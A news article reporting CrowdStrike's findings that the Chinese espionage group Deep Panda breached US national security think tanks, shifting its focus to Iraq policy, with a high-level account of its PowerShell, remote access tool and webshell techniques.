The Chinese cyberattack group Deep Panda has compromised national security think tanks using sophisticated techniques designed to steal confidential data concerning US foreign policy, according to security researchers at CrowdStrike. The CrowdStrike team say that “several” national security-based think tanks have been compromised in the defense, finance, legal and government arenas by the group, which the security researchers call “one of the most advanced Chinese nation-state cyber intrusion groups.” Cyberattacks have been launched by the hackers for almost three years now, but it is only in recent times that Deep Panda’s focus has changed.
CrowdStrike says that attacks are now taking place against think tanks related to security and governmental policy within Iraq and the Middle East, a shift from collecting data on southeast Asia. While the security researchers declined to name the specific think tanks or data that was stolen, the team did say that email accounts, directories and files were compromised.
The team say:
“This is undoubtedly related to the recent Islamic State of Iraq and the Levant (ISIS) takeover of major parts of Iraq and the potential disruption for major Chinese oil interests in that country. In fact, Iraq happens to be the fifth-largest source of crude oil imports for China and the country is the largest foreign investor in Iraq’s oil sector. Thus, it wouldn’t be surprising if the Chinese government is highly interested in getting a better sense of the possibility of deeper U.S. military involvement that could help protect the Chinese oil infrastructure in Iraq.
In fact, the shift in targeting of Iraq policy individuals occurred on June 18, the day that ISIS began its attack on the Baiji oil refinery.”
Deep Panda’s cyberattacks (.PDF) consist of exploiting vulnerabilities in Windows operating systems which allows the group to deploy powershell scripts as scheduled tasks. The scripts are then passed to the powershell interpreter through the command line — which avoid the placement of extraneous files on a victim’s machine — in order to bypass detection. The scripts were scheduled to call back every two hours to Deep Panda’s Command and Control (C&C) center.
Once executed, a .NET executable is run from memory, which in turn then downloads and runs MadHatter .NET Remote Access Tool (RAT), a favored tool of Deep Panda. Webshell implants are also used to ensure low-footprint persistent access to the victim network, keeping the infiltration as secret as possible while the C&C deployed commands such as “tasklist,” “net view,” and “net localgroup administrators,” steals credentials and accesses network data.
CrowdStrike was able to detect the cyberattacks through its Falcon Host software, a security agent which combines endpoint and threat data. This software is offered on a pro-bono basis to think tanks and non-profits, organizations that are unlikely to have enough funding to protect themselves otherwise.
“Deep Panda presents a very serious threat not just to think tanks, but also multinational financial institutions, law firms, defense contractors, and government agencies,” the security researchers say. “Due to their stellar operational security and reliance on anti-forensic and anti-IOC detection techniques, detecting and stopping them is very challenging without the use of next-generation endpoint technology like Falcon Host.”
In June, Crowdstrike said that Putter Panda, a cyber espionage group connected to the country’s military has been targeting US and European government partners in order to steal corporate trade secrets relating to the satellite, aerospace and communication industries.
